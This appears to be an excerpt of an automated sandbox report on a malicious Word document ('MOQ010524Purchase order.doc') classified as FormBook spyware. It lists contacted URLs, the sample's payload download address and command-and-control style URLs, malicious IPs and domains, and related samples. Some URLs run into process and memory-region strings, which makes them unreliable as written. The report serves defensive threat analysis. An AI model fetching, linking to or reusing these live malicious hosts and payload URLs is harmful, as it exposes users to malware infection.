                          https://duckduckgo.com/ac/?q=dfrgui.exe, 00000008.00000003.468221206.0000000005F9E000.00000004.00000020.00020000.00000000.sdmp, 13d6pS3.8.drfalse
                            		high
                            http://ocsp.entrust.net03EQNEDT32.EXE, 00000002.00000002.349581619.00000000006E8000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0EQNEDT32.EXE, 00000002.00000002.349581619.00000000006E8000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.diginotar.nl/cps/pkioverheid0EQNEDT32.EXE, 00000002.00000002.349581619.00000000006E8000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://static.loopia.se/responsive/images/iOS-72.pngdfrgui.exe, 00000008.00000002.847604345.000000000322C000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.847986482.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.00000000033AC000.00000004.00000001.00040000.00000000.sdmpfalse
                              		high
                              https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingdfrgui.exe, 00000008.00000002.847604345.000000000322C000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.847986482.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.00000000033AC000.00000004.00000001.00040000.00000000.sdmpfalse
                                		high
                                https://static.loopia.se/shared/logo/logo-loopia-white.svgdfrgui.exe, 00000008.00000002.847604345.000000000322C000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.847986482.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.00000000033AC000.00000004.00000001.00040000.00000000.sdmpfalse
                                  		high
                                  https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwedfrgui.exe, 00000008.00000002.847604345.000000000322C000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.847986482.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.00000000033AC000.00000004.00000001.00040000.00000000.sdmpfalse
                                    		high
                                    https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwdfrgui.exe, 00000008.00000002.847604345.000000000322C000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.847986482.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.00000000033AC000.00000004.00000001.00040000.00000000.sdmpfalse
                                      		high
                                      https://universalmovies.top/opp.scrhhC:EQNEDT32.EXE, 00000002.00000002.349581619.000000000066F000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: phishing
                                      		unknown
                                      https://universalmovies.top/opp.scrjEQNEDT32.EXE, 00000002.00000002.349581619.000000000066F000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: phishing
                                      		unknown
                                      https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkdfrgui.exe, 00000008.00000002.847604345.000000000322C000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.847986482.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.00000000033AC000.00000004.00000001.00040000.00000000.sdmpfalse
                                        		high
                                        http://www.searchvity.com/?dn=dfrgui.exe, 00000008.00000002.847604345.0000000002D76000.00000004.10000000.00040000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.0000000002EF6000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.479701614.0000000001BA6000.00000004.80000000.00040000.00000000.sdmpfalse
                                        • 3%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://mrart.co.kr/ufuh/?pl=dHCsNlEiGcw6UpYNsSDwUGw5CVcYr5PGduxYMRdfrgui.exe, 00000008.00000002.847604345.00000000036E2000.00000004.10000000.00040000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.0000000003862000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://ocsp.entrust.net0DEQNEDT32.EXE, 00000002.00000002.349581619.00000000006E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.sqlite.org/copyright.html.dfrgui.exe, 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmp, sqlite3.dll.8.drfalse
                                          		high
                                          https://static.loopia.se/shared/images/additional-pages-hero-shape.webpdfrgui.exe, 00000008.00000002.847604345.000000000322C000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.847986482.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.00000000033AC000.00000004.00000001.00040000.00000000.sdmpfalse
                                            		high
                                            https://static.loopia.se/shared/style/2022-extra-pages.cssdfrgui.exe, 00000008.00000002.847604345.000000000322C000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.847986482.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.00000000033AC000.00000004.00000001.00040000.00000000.sdmpfalse
                                              		high
                                              http://aceautocorp.com/ufuh/?pl=rAUFcaE3iKkr5p3m3tCLoIcgJcoBLqHpCHmtodfrgui.exe, 00000008.00000002.847604345.0000000003550000.00000004.10000000.00040000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.00000000036D0000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://static.loopia.se/responsive/images/iOS-114.pngdfrgui.exe, 00000008.00000002.847604345.000000000322C000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.847986482.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.00000000033AC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                		high
                                                http://crl.entrust.net/server1.crl0EQNEDT32.EXE, 00000002.00000002.349581619.00000000006E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://www.ibistradingco.com/ufuh/?pl=hcZX01VSmexgOFZwe0PcJnDn64JizU3MIAbqwzBBfnOXJDQ4bl307S3dnZeIWdfrgui.exe, 00000008.00000002.847604345.0000000003A06000.00000004.10000000.00040000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.0000000003B86000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkdfrgui.exe, 00000008.00000002.847604345.000000000322C000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.847986482.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.00000000033AC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    		high
                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=dfrgui.exe, 00000008.00000003.468221206.0000000005F9E000.00000004.00000020.00020000.00000000.sdmp, 13d6pS3.8.drfalse
                                                      		high
                                                      https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchdfrgui.exe, 00000008.00000003.468221206.0000000005F9E000.00000004.00000020.00020000.00000000.sdmp, 13d6pS3.8.drfalse
                                                        		high
                                                        http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utdfrgui.exe, 00000008.00000002.847604345.000000000322C000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.847986482.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.00000000033AC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          		high
                                                          https://static.loopia.se/responsive/styles/reset.cssdfrgui.exe, 00000008.00000002.847604345.000000000322C000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.847986482.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.00000000033AC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            		high
                                                            https://www.google.com/favicon.ico13d6pS3.8.drfalse
                                                              		high
                                                              https://ac.ecosia.org/autocomplete?q=dfrgui.exe, 00000008.00000003.468221206.0000000005F9E000.00000004.00000020.00020000.00000000.sdmp, 13d6pS3.8.drfalse
                                                                		high
                                                                https://static.loopia.se/responsive/images/iOS-57.pngdfrgui.exe, 00000008.00000002.847604345.000000000322C000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.847986482.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.00000000033AC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  		high
                                                                  http://crl.pkioverheid.nl/DomOvLatestCRL.crl0EQNEDT32.EXE, 00000002.00000002.349581619.00000000006E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://universalmovies.top/EQNEDT32.EXE, 00000002.00000002.349581619.00000000006AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: phishing
                                                                  		unknown
                                                                  http://www.searchvity.com/dfrgui.exe, 00000008.00000002.847604345.0000000002D76000.00000004.10000000.00040000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.0000000002EF6000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.479701614.0000000001BA6000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://jnkinteractive.co.kr/ufuh/?pl=EbiRYmriZV7/HiPUOKeH2YEx7MyTQrgkk6gsaa5XxsDKCOU8Ma1/AS5omL8UMRhdfrgui.exe, 00000008.00000002.847604345.0000000003B98000.00000004.10000000.00040000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.0000000003D18000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=padfrgui.exe, 00000008.00000002.847604345.000000000322C000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.847986482.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.00000000033AC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    		high
                                                                    https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=padfrgui.exe, 00000008.00000002.847604345.000000000322C000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.847986482.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.00000000033AC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      		high
                                                                      https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkindfrgui.exe, 00000008.00000002.847604345.000000000322C000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.847986482.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.00000000033AC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        		high
                                                                        https://secure.comodo.com/CPS0EQNEDT32.EXE, 00000002.00000002.349581619.00000000006E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=dfrgui.exe, 00000008.00000003.468221206.0000000005F9E000.00000004.00000020.00020000.00000000.sdmp, 13d6pS3.8.drfalse
                                                                            		high
                                                                            http://crl.entrust.net/2048ca.crl0EQNEDT32.EXE, 00000002.00000002.349581619.00000000006E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=padfrgui.exe, 00000008.00000002.847604345.000000000322C000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.847986482.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.00000000033AC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                		high
                                                                                https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwebdfrgui.exe, 00000008.00000002.847604345.000000000322C000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.847986482.00000000051F0000.00000004.00000800.00020000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847380448.00000000033AC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=dfrgui.exe, 00000008.00000003.468221206.0000000005F9E000.00000004.00000020.00020000.00000000.sdmp, 13d6pS3.8.drfalse
                                                                                    		high

                                                                                    World Map of Contacted IPs

                                                                                    • No. of IPs < 25%
                                                                                    • 25% < No. of IPs < 50%
                                                                                    • 50% < No. of IPs < 75%
                                                                                    • 75% < No. of IPs

                                                                                    Public IPs

                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                    194.9.94.86
                                                                                    		www.xn--matfrmn-jxa4m.seSweden
                                                                                    		39570LOOPIASEtrue
                                                                                    45.33.6.223
                                                                                    		www.sqlite.orgUnited States
                                                                                    		63949LINODE-APLinodeLLCUSfalse
                                                                                    104.21.74.191
                                                                                    		universalmovies.topUnited States
                                                                                    		13335CLOUDFLARENETUStrue
                                                                                    154.41.250.58
                                                                                    		www.ibistradingco.com.cdn.hstgr.netUnited States
                                                                                    		174COGENT-174UStrue
                                                                                    94.23.162.163
                                                                                    		www.kinkynerdspro.blogFrance
                                                                                    		16276OVHFRtrue
                                                                                    198.12.241.35
                                                                                    		aceautocorp.comUnited States
                                                                                    		26496AS-26496-GO-DADDY-COM-LLCUStrue
                                                                                    91.195.240.19
                                                                                    		parkingpage.namecheap.comGermany
                                                                                    		47846SEDO-ASDEfalse
                                                                                    208.91.197.13
                                                                                    		www.riveramayahousing.comVirgin Islands (BRITISH)
                                                                                    		40034CONFLUENCE-NETWORK-INCVGtrue
                                                                                    67.223.117.189
                                                                                    		www.touchclean.topUnited States
                                                                                    		15189VIMRO-AS15189UStrue
                                                                                    183.111.183.31
                                                                                    		jnkinteractive.co.krKorea Republic of
                                                                                    		4766KIXS-AS-KRKoreaTelecomKRtrue
                                                                                    66.96.161.166
                                                                                    		www.terelprime.comUnited States
                                                                                    		29873BIZLAND-SDUStrue

                                                                                    Private

                                                                                    IP
                                                                                    192.168.2.255

                                                                                    General Information

                                                                                    Joe Sandbox version:40.0.0 Tourmaline
                                                                                    Analysis ID:1435172
                                                                                    Start date and time:2024-05-02 08:25:18 +02:00
                                                                                    Joe Sandbox product:CloudBasic
                                                                                    Overall analysis duration:0h 11m 27s
                                                                                    Hypervisor based Inspection enabled:false
                                                                                    Report type:full
                                                                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                    Number of analysed new started processes analysed:14
                                                                                    Number of new started drivers analysed:0
                                                                                    Number of existing processes analysed:0
                                                                                    Number of existing drivers analysed:0
                                                                                    Number of injected processes analysed:2
                                                                                    Technologies:
                                                                                    • HCA enabled
                                                                                    • EGA enabled
                                                                                    • AMSI enabled
                                                                                    Analysis Mode:default
                                                                                    Analysis stop reason:Timeout
                                                                                    Sample name:MOQ010524Purchase order.doc
                                                                                    Detection:MAL
                                                                                    Classification:mal100.troj.spyw.expl.evad.winDOC@11/15@22/12
                                                                                    EGA Information:
                                                                                    • Successful, ratio: 60%
                                                                                    HCA Information:
                                                                                    • Successful, ratio: 74%
                                                                                    • Number of executed functions: 47
                                                                                    • Number of non-executed functions: 188
                                                                                    Cookbook Comments:
                                                                                    • Found application associated with file extension: .doc
                                                                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                    • Attach to Office via COM
                                                                                    • Active ActiveX Object
                                                                                    • Scroll down
                                                                                    • Close Viewer
                                                                                    • Override analysis time to 70165.1630776322 for current running targets taking high CPU consumption
                                                                                    • Override analysis time to 140330.326155264 for current running targets taking high CPU consumption

                                                                                    Warnings

                                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, svchost.exe
                                                                                    • Execution Graph export aborted for target EQNEDT32.EXE, PID 1808 because there are no executed function
                                                                                    • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                    • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                    • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                    Simulations

                                                                                    Behavior and APIs

                                                                                    TimeTypeDescription
                                                                                    08:26:04API Interceptor266x Sleep call for process: EQNEDT32.EXE modified
                                                                                    08:26:08API Interceptor5x Sleep call for process: op55336.scr modified
                                                                                    08:26:50API Interceptor18586x Sleep call for process: eDTvjJMLUGCaWhgZ.exe modified
                                                                                    08:27:00API Interceptor7623161x Sleep call for process: dfrgui.exe modified

                                                                                    Joe Sandbox View / Context

                                                                                    IPs

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    194.9.94.86SalinaGroup.docGet hashmaliciousFormBookBrowse
                                                                                    • www.xn--matfrmn-jxa4m.se/ufuh/
                                                                                    PAY-0129.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.torentreprenad.com/s2u9/?7H=mTJ4yhH&qHaT0h=5U7DALWrxqzr56VTS66DkMzivwb8eJw+QuQWKosT9GGOOJNmCsoJdRf2YtOKiYr885RpspfnWz9oIB8tKqH0jqi0U2E5YHFFFQ==
                                                                                    DHL_SOA_1004404989.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.torentreprenad.com/s2u9/?j8j=6NzlX4xHmtqH&rR=5U7DALWrxqzr56VMLK7KnfayygnCZIw+QuQWKosT9GGOOJNmCsoJdRf2YtOKiYr885RpspfnWz9oIB8tKqH3pN+aCUsxPyV8FA==
                                                                                    Scan00516.jsGet hashmaliciousFormBook, MailPassView, WSHRATBrowse
                                                                                    • www.acre-com.com/me15/?i8O=bxl0&VPudI=AMxDUnLLexuTfXRuHqoxzPfeXrfBw2lKu15RcCpXpuJEBCulcUbatn2YVJ6xbnCfmbZZ
                                                                                    SHIPPINGDOCUMENTS.25.23.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.udda.app/ga36/?-Zk4Ah=uKy05ssFXwD7lx+pwOkpcz0JYvvlr0Fm4k7Q090T/1T8NUAbWqhr3VP8iMZHhaUYUaRp&-ZVd=5jo8nLy8
                                                                                    g8G146l8XU.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.frostdal.se/s26y/?8pAlmdiX=882d78zUy4+UMlJ0mFcKU0FzzswBpgbUl63S0CTJJ7YYOy24S5YeYqbYAzkKlVaYLwFJ&h0DxKN=l4G4b
                                                                                    Portfunktionen.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                    • www.seansaren.com/8mkm/?YfxdA=0TBXZr6&8p9dCJU=dq4Bmr7ke09F/j6gqFBYy8hUF+OUtSAKtvg3uyO8Hql2Nxy80d4gIJwQmfcVpJqaQnb4Hw97lY925H1T11NKL9RBbHv3rBHVxw==
                                                                                    shdybron2.1.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.giftr.online/sk29/?4hHxFhL=kIJ0w1eRhzsxIkY2EDI0ouQu9gQ5uAgdx+JFieQVw6ZUYc+rFfN6m9UPXTH9XP8rHUyw&n0=cRkX
                                                                                    Hotel Order Booking.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.mariestadsturistbyra.com/8h9m/?4hChZVEp=POzhDC3cChJGiberk7iu0jitBnVtkIhI/7sU91OjKHP9uyI8Efo/vkBQlZgSUTycxndK9EogPlcv/zCu18J5OZVYs8G7lA7x0Q==&2dcD=CpcPID
                                                                                    PO 20002001.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.mariestadsturistbyra.com/8h9m/?FP=POzhDC3cChJGiberiv7k1nCvX3QSts9I/7sU91OjKHP9uyI8Efo/vkNQlZgSUTycxndK9EogPlcv/zCu18J0Oc1Zr/+AlA+h1Q==&Vxld=q2JhAP
                                                                                    45.33.6.223EMPLOYEE-FINAL-SETTLEMENTS.docGet hashmaliciousFormBookBrowse
                                                                                    • www.sqlite.org/2020/sqlite-dll-win32-x86-3310000.zip
                                                                                    SalinaGroup.docGet hashmaliciousFormBookBrowse
                                                                                    • www.sqlite.org/2017/sqlite-dll-win32-x86-3160000.zip
                                                                                    SecuriteInfo.com.Exploit.ShellCode.69.20357.30006.rtfGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                    • www.sqlite.org/2017/sqlite-dll-win32-x86-3180000.zip
                                                                                    APR PAYROLL.docGet hashmaliciousFormBookBrowse
                                                                                    • www.sqlite.org/2017/sqlite-dll-win32-x86-3200000.zip
                                                                                    tee030.docGet hashmaliciousFormBookBrowse
                                                                                    • www.sqlite.org/2018/sqlite-dll-win32-x86-3250000.zip
                                                                                    Invoice-4536PND.pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                    • www.sqlite.org/2018/sqlite-dll-win32-x86-3230000.zip
                                                                                    RFQ__Quotation_Pvq-100-23-258.docGet hashmaliciousFormBookBrowse
                                                                                    • www.sqlite.org/2020/sqlite-dll-win32-x86-3310000.zip
                                                                                    Microsoftdigitalwallettechnologydevelopedrecentlyforsecuritypurposetoprotectcustomer.Doc.docGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                    • www.sqlite.org/2018/sqlite-dll-win32-x86-3230000.zip
                                                                                    BANK_MT103_PAYMENT.docGet hashmaliciousFormBookBrowse
                                                                                    • www.sqlite.org/2016/sqlite-dll-win32-x86-3140000.zip
                                                                                    Waybill.xlsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                    • www.sqlite.org/2020/sqlite-dll-win32-x86-3310000.zip
                                                                                    104.21.74.191file.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                                                                                    • tuong.me/wp-login.php

                                                                                    Domains

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    parkingpage.namecheap.comyZcecBUXN7.exeGet hashmaliciousFormBookBrowse
                                                                                    • 91.195.240.19
                                                                                    00389692222221902.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                    • 91.195.240.19
                                                                                    RFQ02212420.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                    • 91.195.240.19
                                                                                    SecuriteInfo.com.Win64.PWSX-gen.20556.23749.exeGet hashmaliciousFormBookBrowse
                                                                                    • 91.195.240.19
                                                                                    PI No. LI-4325.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                    • 91.195.240.19
                                                                                    DHL Shipping Receipt_Waybill Doc_PRG2110017156060.exeGet hashmaliciousFormBookBrowse
                                                                                    • 91.195.240.19
                                                                                    DHL Overdue Account Notice - 1606622076.PDF.exeGet hashmaliciousFormBookBrowse
                                                                                    • 91.195.240.19
                                                                                    SalinaGroup.docGet hashmaliciousFormBookBrowse
                                                                                    • 91.195.240.19
                                                                                    prnportccy.vbsGet hashmaliciousFormBookBrowse
                                                                                    • 91.195.240.19
                                                                                    Doc 30042024.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                    • 91.195.240.19
                                                                                    www.riveramayahousing.comNEW-ORDER_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                    • 208.91.197.13
                                                                                    alhadani Aprilorders140424.scr.exeGet hashmaliciousFormBookBrowse
                                                                                    • 208.91.197.13
                                                                                    AWB5889829680.scr.exeGet hashmaliciousFormBookBrowse
                                                                                    • 208.91.197.13
                                                                                    Invoice.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                    • 208.91.197.13
                                                                                    www.kinkynerdspro.blogSalinaGroup.docGet hashmaliciousFormBookBrowse
                                                                                    • 54.38.220.85
                                                                                    NEW-ORDER_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                    • 94.23.162.163
                                                                                    alhadani Aprilorders140424.scr.exeGet hashmaliciousFormBookBrowse
                                                                                    • 94.23.162.163
                                                                                    AWB5889829680.scr.exeGet hashmaliciousFormBookBrowse
                                                                                    • 94.23.162.163
                                                                                    Payment_Advice.pdf.exeGet hashmaliciousFormBookBrowse
                                                                                    • 94.23.162.163
                                                                                    BL7247596940.pdf.exeGet hashmaliciousFormBookBrowse
                                                                                    • 54.38.220.85
                                                                                    Arrival Notice.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                    • 94.23.162.163
                                                                                    www.xn--matfrmn-jxa4m.seSalinaGroup.docGet hashmaliciousFormBookBrowse
                                                                                    • 194.9.94.86
                                                                                    NEW-ORDER_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                    • 194.9.94.85
                                                                                    alhadani Aprilorders140424.scr.exeGet hashmaliciousFormBookBrowse
                                                                                    • 194.9.94.85
                                                                                    AWB5889829680.scr.exeGet hashmaliciousFormBookBrowse
                                                                                    • 194.9.94.85
                                                                                    Search.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                    • 194.9.94.85

                                                                                    ASNs

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    CLOUDFLARENETUScXPFfk0pBp7bEsb.pif.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                    • 104.26.12.205
                                                                                    SOA.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                    • 104.26.12.205
                                                                                    List of items.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                    • 172.67.74.152
                                                                                    RADOSS - PO.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                    • 104.26.12.205
                                                                                    Evgh. rvs Armenia. 30.04.2024.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                    • 172.67.220.6
                                                                                    DATASHEET rfq.exeGet hashmaliciousGuLoaderBrowse
                                                                                    • 162.159.133.233
                                                                                    DNXS-04-22.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                    • 104.21.27.85
                                                                                    PO 32187 #290424.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                    • 104.21.27.85
                                                                                    EMPLOYEE-FINAL-SETTLEMENTS.docGet hashmaliciousFormBookBrowse
                                                                                    • 104.21.25.202
                                                                                    SecuriteInfo.com.Win32.PWSX-gen.8803.13656.exeGet hashmaliciousRisePro StealerBrowse
                                                                                    • 104.26.5.15
                                                                                    LOOPIASESalinaGroup.docGet hashmaliciousFormBookBrowse
                                                                                    • 194.9.94.86
                                                                                    NEW-ORDER_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                    • 194.9.94.85
                                                                                    alhadani Aprilorders140424.scr.exeGet hashmaliciousFormBookBrowse
                                                                                    • 194.9.94.85
                                                                                    AWB5889829680.scr.exeGet hashmaliciousFormBookBrowse
                                                                                    • 194.9.94.85
                                                                                    Search.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                    • 194.9.94.85
                                                                                    PAY-0129.exeGet hashmaliciousFormBookBrowse
                                                                                    • 194.9.94.86
                                                                                    PgbcaAGOnA.exeGet hashmaliciousFormBookBrowse
                                                                                    • 194.9.94.85
                                                                                    admindemo.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                    • 194.9.94.85
                                                                                    Order_N#U00b0_202200027.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                    • 194.9.94.85
                                                                                    CamScanner_12-12-2023_01.03.exeGet hashmaliciousFormBook, zgRATBrowse
                                                                                    • 194.9.94.85
                                                                                    COGENT-174USaduLTc2Dny.elfGet hashmaliciousMiraiBrowse
                                                                                    • 38.247.148.219
                                                                                    SecuriteInfo.com.Win64.PWSX-gen.20556.23749.exeGet hashmaliciousFormBookBrowse
                                                                                    • 38.63.111.149
                                                                                    SecuriteInfo.com.Win32.PWSX-gen.7200.9677.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                    • 38.47.232.37
